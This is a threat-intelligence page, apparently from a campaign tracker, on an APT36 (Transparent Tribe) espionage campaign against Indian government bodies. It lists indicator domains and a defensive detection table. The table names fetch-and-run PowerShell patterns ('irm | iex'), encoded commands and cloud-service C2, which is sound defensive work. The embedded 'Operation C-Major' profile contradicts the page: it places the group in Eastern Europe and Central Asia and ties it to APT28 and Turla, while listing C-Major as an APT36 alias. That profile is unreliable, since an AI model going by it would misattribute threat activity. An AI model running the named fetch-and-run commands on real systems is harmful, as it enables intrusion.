Campaigns
APT36 (Transparent Tribe)  Sheet Attack Campaign

APT36 (Transparent Tribe) Sheet Attack Campaign

APT36FIREPOWERSheetCreepIndia EspionageVibeware
A Pakistan linked threat cluster assessed with medium confidence as APT36 (Transparent Tribe) or a closely aligned sub-group is conducting sustained cyber-espionage against Indian government entities. The latest iteration layers two freshly borrowed Microsoft CVEs (CVE-2026-21509 / CVE-2026-21513) onto an existing delivery chain of weaponized RTF documents and LNK shortcuts, deploying the updated FIREPOWER backdoor against broad Indian targets and dropping a fresh SHEETCREEP build alongside a new CrystalShell-over-Slack variant specifically against a Kashmir-focused target—running Crystal, .NET, and PowerShell toolchains simultaneously from what researchers call a “vibeware factory.”

Indicators of Compromise

hcidoc.in
hciaccounts.in

APT Groups1

Operation C-MajorPK

Summary of Actor:Operation C-Major is a cyber espionage campaign attributed to a sophisticated threat group. The operation is known for targeting government and diplomatic entities in Eastern Europe and Central Asia. It employs a variety of attack vectors, including spear-phishing and malware. General Features:The group behind Operation C-Major is known for deploying custom malware and sophisticated evasion techniques. They are highly persistent and often use local language in their phishing campaigns to increase trust. Related Other Groups: APT28,Turla Indicators of Attack (IoA): Suspicious email attachments Unusual network traffic to external servers Usage of compromised legitimate credentials Recent Activities and Trends: Latest Campaigns : Recent campaigns have focused on exploiting vulnerabilities in widely-used software to gain initial access. There have been reports of increased phishing emails mimicking government communications. Emerging Trends : The group has shown a shift towards more sophisticated spear-phishing techniques, including the use of deepfake technology to impersonate key individuals. Additionally, there is an increased focus on zero-day vulnerabilities.

APT 36APT36C-MajorCOPPER FIELDSTONEEarth KarkaddanGreen HavildarMythic LeopardProjectMStorm-0156TMP.LapisTransparent Tribe

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION/DETECTION

Source: attack.mitre.org

Technique ID

Technique Name

Detection ID

Detection Name

Recommended Detection Action

T1566.001

Phishing: Spearphishing Attachment

DET0115

Spearphishing Attachment Detection

Alert on email delivery of RTF files with OLE objects or LNK shortcuts to Indian government domains; inspect for CVE-2026-21509 shellcode triggers.

T1566.002

Phishing: Spearphishing Link

DET0116

Spearphishing Link Detection

Block links directing Indian Windows users to threat-actor controlled ZIP delivery servers using geofencing + User-Agent checks (hcidoc[.]in).

T1204.002

User Execution: Malicious File

DET0294

Malicious File Execution Detection

Alert on .LNK files opened from Downloads or Temp directories that spawn PowerShell with -e (Base64 encoded) or Invoke-RestMethod | iex.

T1059.001

Command and Scripting Interpreter: PowerShell

DET0455

PowerShell Behavioral Detection

Detect irm [url] | iex patterns and PowerShell spawned by chrome.exe, edge.exe or non-browser binaries polling Firebase/Google Sheets.

T1106

Native API

DET0459

Non-Standard Scripting Language Execution

Flag execution of binaries compiled in niche languages (Crystal, Nim, Zig) not present in standard software baselines on government endpoints.

T1105

Ingress Tool Transfer

DET0060

Ingress Tool Transfer Detection

Monitor curl/PowerShell download of ZIP archives from actor-controlled domains; alert on hcidoc[.]in and similar typosquatted .in domains.

T1112

Modify Registry

DET0280

Registry Modification Detection

Alert on scheduled task creation by PowerShell running from %USERPROFILE% that persists LNK-launched FIREPOWER at user logon.

T1140

Deobfuscate/Decode Files or Information

DET0275

Deobfuscation/Decode Detection

Detect Assembly.Load of byte-reversed PE buffers (details.png reversal) via ETW or AMSI telemetry in .NET runtime.

T1219

Remote Access Tools

DET0496

Remote Access Tool Detection

Flag non-IT-deployed remote access: SHEETCREEP polling Google Sheets every 3s, FIREPOWER polling Firebase every 120–300s, MAILCREEP polling Azure mailbox.

T1082

System Information Discovery

DET0190

System Information Discovery Detection

Alert on PowerShell enumeration of C:\Program Files, %USERPROFILE%\Desktop, and Downloads immediately after LNK execution.

T1083

File and Directory Discovery

DET0192

File and Directory Discovery Detection

Detect scanning of .txt, .csv, .pdf, .docx, .xlsx, .pptx, .html files in Desktop/Documents/OneDrive by non-user processes (document stealer).

T1567.001

Exfiltration Over Web Service: Exfiltration to Code Repository

DET0420

Exfiltration to Code Repository Detection

Alert on git push or REST API calls to private GitHub repos from workstations during non-business hours (document stealer upload).

T1546.005

Event Triggered Execution: Trap

DET0145

Scheduled Task / Logon Script Detection

Detect GServices.vbs registered as a logon scheduled task loading SHEETCREEP via PowerShell reflection at each user logon.

T1552.001

Unsecured Credentials: Credentials In Files

DET0200

Credential in Files Detection

Alert on MAILCREEP reading credential material from the filesystem to authenticate against Microsoft Graph API / Azure tenant.

T1071.001

Application Layer Protocol: Web Protocols

DET0425

C2 over Web Protocols Detection

Detect HTTPS C2 to Google Sheets API, Firebase Realtime Database, and Microsoft Graph API from non-browser processes; baseline normal traffic and alert on anomalies.


Observed Countries1

IN (519)